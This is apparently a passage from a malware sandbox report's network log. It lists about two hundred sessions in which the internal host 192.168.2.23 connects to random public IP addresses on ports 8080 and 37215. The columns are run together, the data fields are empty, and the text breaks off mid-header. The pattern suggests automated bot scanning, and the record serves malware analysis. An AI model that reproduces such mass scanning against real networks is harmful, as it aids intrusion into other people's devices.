                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24127192.168.2.235830883.137.128.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24128192.168.2.2352084106.249.54.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24129192.168.2.234137094.71.214.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24130192.168.2.2348812155.48.20.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24131192.168.2.234367417.240.33.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24132192.168.2.2341656176.176.226.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24133192.168.2.2339646105.114.18.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24134192.168.2.2351910203.191.136.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24135192.168.2.233816832.42.188.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24136192.168.2.2344544204.171.134.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24137192.168.2.2333164136.195.100.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24138192.168.2.233680861.92.250.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24139192.168.2.2356342192.158.204.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24140192.168.2.233338857.23.216.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24141192.168.2.233298675.48.178.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24142192.168.2.2345076164.169.158.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24143192.168.2.235878258.176.140.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24144192.168.2.2339336179.147.130.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24145192.168.2.23341689.75.185.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24146192.168.2.2345136145.1.150.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24147192.168.2.2354228102.63.148.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24148192.168.2.233352260.108.139.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24149192.168.2.233531667.97.5.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24150192.168.2.2356088139.178.139.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24151192.168.2.235660647.239.43.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24152192.168.2.2339190118.223.79.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24153192.168.2.2359802136.243.201.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24154192.168.2.235809298.178.194.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24155192.168.2.235406051.240.178.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24156192.168.2.2342894218.37.109.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24157192.168.2.234970065.195.79.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24158192.168.2.2340244131.183.196.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24159192.168.2.234685837.166.172.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24160192.168.2.2353552156.92.27.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24161192.168.2.235074818.118.207.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24162192.168.2.2356814162.76.188.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24163192.168.2.2353550193.237.242.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24164192.168.2.235311095.139.30.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24165192.168.2.2347728170.253.242.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24166192.168.2.235268294.129.236.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24167192.168.2.2354198187.249.248.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24168192.168.2.2349470197.230.232.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24169192.168.2.235700666.108.39.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24170192.168.2.235880441.214.253.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24171192.168.2.2343404197.194.87.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24172192.168.2.2353620197.228.104.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24173192.168.2.2336644197.112.230.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24174192.168.2.2351086195.36.29.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24175192.168.2.2358786219.73.78.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24176192.168.2.235940698.236.163.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24177192.168.2.2333158171.192.76.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24178192.168.2.235106041.239.19.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24179192.168.2.2357166157.78.149.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24180192.168.2.2351612197.67.39.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24181192.168.2.2347386157.72.11.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24182192.168.2.235548441.230.233.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24183192.168.2.2348554157.2.173.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24184192.168.2.2346918132.4.67.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24185192.168.2.2339516216.60.203.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24186192.168.2.2350440157.223.1.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24187192.168.2.2337358197.204.72.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24188192.168.2.2349702157.129.147.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24189192.168.2.2349544116.199.200.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24190192.168.2.233929441.222.146.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24191192.168.2.2356052140.20.247.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24192192.168.2.2334966197.242.114.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24193192.168.2.2337626197.157.142.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24194192.168.2.234078641.197.93.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24195192.168.2.235001641.125.29.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24196192.168.2.234287041.209.231.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24197192.168.2.2340564210.56.188.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24198192.168.2.235783441.70.36.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24199192.168.2.2351704197.244.180.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24200192.168.2.235403061.220.192.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24201192.168.2.2341706199.54.167.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24202192.168.2.2334874205.195.57.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24203192.168.2.2339486157.245.19.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24204192.168.2.2334608165.201.32.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24205192.168.2.233830441.232.21.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24206192.168.2.236007441.47.235.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24207192.168.2.236098692.194.161.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24208192.168.2.2353192157.92.236.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24209192.168.2.2349008191.236.67.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24210192.168.2.235600441.121.218.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24211192.168.2.235727441.219.232.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24212192.168.2.2346556157.248.29.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24213192.168.2.2355458157.201.160.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24214192.168.2.2340704157.60.194.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24215192.168.2.2337632197.18.151.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24216192.168.2.2333584193.243.141.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24217192.168.2.236082841.65.146.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24218192.168.2.2333184160.167.103.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24219192.168.2.2334836157.74.168.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24220192.168.2.234008841.79.51.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24221192.168.2.2352840197.27.167.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24222192.168.2.2359372197.183.20.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24223192.168.2.2341070157.206.88.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24224192.168.2.2336482157.3.136.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24225192.168.2.2359020157.196.42.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24226192.168.2.235861841.197.158.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24227192.168.2.235143841.95.253.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24228192.168.2.234964041.107.71.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24229192.168.2.2345882157.42.15.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24230192.168.2.2351072157.48.98.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24231192.168.2.2355222157.111.205.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24232192.168.2.233446441.65.27.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24233192.168.2.236098641.195.168.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24234192.168.2.2353250157.144.180.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24235192.168.2.2339480157.58.14.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24236192.168.2.2348458197.225.55.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24237192.168.2.2359582185.144.98.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24238192.168.2.235380641.44.241.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24239192.168.2.235312241.184.168.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24240192.168.2.234647865.35.132.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24241192.168.2.234189041.98.202.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24242192.168.2.2351932198.100.12.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24243192.168.2.2351274197.200.170.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24244192.168.2.2352202157.141.140.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24245192.168.2.2342518157.162.87.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24246192.168.2.2354766115.131.181.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24247192.168.2.235466241.53.71.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24248192.168.2.234702831.206.167.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24249192.168.2.23373301.56.56.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24250192.168.2.2335566197.66.147.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24251192.168.2.235664841.20.1.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24252192.168.2.2336746197.126.240.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24253192.168.2.2348576197.130.181.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24254192.168.2.234926241.15.250.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24255192.168.2.2349904197.24.152.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24256192.168.2.2338176197.166.26.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24257192.168.2.2344616197.19.164.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24258192.168.2.2348192157.131.182.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24259192.168.2.2335160157.61.172.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24260192.168.2.2351728157.118.106.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24261192.168.2.2340422197.63.253.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24262192.168.2.2350392197.51.144.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24263192.168.2.23590745.144.96.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24264192.168.2.233591841.103.232.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24265192.168.2.2338036157.109.96.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24266192.168.2.236096013.145.188.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24267192.168.2.2353904197.95.254.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24268192.168.2.235608041.194.146.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24269192.168.2.2343520157.239.79.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24270192.168.2.2344264157.18.126.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24271192.168.2.2357178157.8.159.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24272192.168.2.2348320197.227.226.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24273192.168.2.235103241.55.60.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24274192.168.2.2343512157.61.190.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24275192.168.2.234661641.75.227.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24276192.168.2.235374841.80.60.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24277192.168.2.2342116157.149.123.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24278192.168.2.233387234.78.89.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24279192.168.2.234998857.108.76.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24280192.168.2.2342656157.148.169.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24281192.168.2.235042841.244.15.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24282192.168.2.235564041.139.178.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24283192.168.2.235621841.99.133.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24284192.168.2.233971041.224.34.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24285192.168.2.2347530167.136.197.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24286192.168.2.2345864197.40.38.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24287192.168.2.2347474197.4.69.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24288192.168.2.2335814197.175.193.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24289192.168.2.2348654197.137.52.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24290192.168.2.2351068138.248.48.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24291192.168.2.2339410197.251.140.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24292192.168.2.2355442197.81.18.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24293192.168.2.234037641.154.165.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24294192.168.2.2344904206.200.29.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24295192.168.2.2340392157.83.103.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24296192.168.2.235455447.48.91.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24297192.168.2.235422043.253.79.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24298192.168.2.2360906157.25.51.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24299192.168.2.2352190197.204.68.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24300192.168.2.2336614157.218.201.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24301192.168.2.2344048157.184.29.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24302192.168.2.2352798191.146.240.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24303192.168.2.234699241.81.41.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24304192.168.2.2353824157.59.212.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24305192.168.2.234622841.137.136.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24306192.168.2.2343910157.67.0.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24307192.168.2.2345604197.156.145.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24308192.168.2.235328681.207.243.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24309192.168.2.2355960157.11.84.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24310192.168.2.2346748162.178.240.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24311192.168.2.2335444197.18.114.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24312192.168.2.2336048197.170.196.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24313192.168.2.2342994197.89.245.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24314192.168.2.234006441.4.222.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24315192.168.2.235557241.39.236.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24316192.168.2.2341652157.202.53.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24317192.168.2.2358250184.81.6.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24318192.168.2.234552841.53.228.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24319192.168.2.2343080124.119.90.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24320192.168.2.2337566197.224.40.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24321192.168.2.2335718197.26.60.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24322192.168.2.2358458157.123.255.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24323192.168.2.235735641.116.119.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24324192.168.2.2352530197.118.151.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24325192.168.2.2335340197.128.214.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24326192.168.2.2360044157.209.244.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24327192.168.2.2357830157.75.39.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24328192.168.2.2335300157.32.213.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24329192.168.2.2346594106.73.15.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24330192.168.2.233314241.246.41.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24331192.168.2.234634441.39.114.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24332192.168.2.2337686197.249.204.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24333192.168.2.2334430149.53.234.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24334192.168.2.2339264157.139.174.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24335192.168.2.233612041.8.225.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
